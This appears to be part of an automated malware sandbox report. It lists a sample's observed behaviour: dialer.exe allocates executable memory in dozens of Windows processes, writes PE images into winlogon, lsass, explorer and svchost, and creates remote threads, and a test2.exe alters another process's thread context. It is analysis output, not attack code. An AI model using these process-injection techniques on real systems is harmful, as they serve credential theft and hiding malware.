Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2108BCE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29166930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: 8C70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D38C1E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D9332C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 27C86A50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 2497B690000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 138E7F80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20D8E630000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28A1F3D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1F9A2AB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 157C35C0000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AED9273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 8799273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5377273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D53273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B38273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBFD273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5904273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7316273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4E86273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 473C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6F9D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 83BC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D3F7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A416273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BDF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C026273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C9F3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 645B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B2A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4F6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2AB4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4ADB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 25DA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F535273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F0D6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FFB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C257273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8BCE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6693273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13FF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D57273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 69B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CC74273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5DA7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F389273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3B8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40E4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A653273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 27BC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B15273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 621A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F48273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8B4B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 683D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8C7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2E26273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6C5E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D593273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC65273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 777C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D0A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AB4C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2A64273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 641A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4935273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 602E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E7B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E815273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5234273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9DA9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 602E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8C1E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 332C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 86A5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B69273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E7F8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8E63273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1F3D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A2AB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C35C273C

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4160000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 8C70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D38C1E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D9332C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C86A50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 2497B690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 138E7F80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20D8E630000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28A1F3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F9A2AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 157C35C0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 2580 base: 8C70000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe

Thread register set: target process: 7348

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4160000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 8C70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
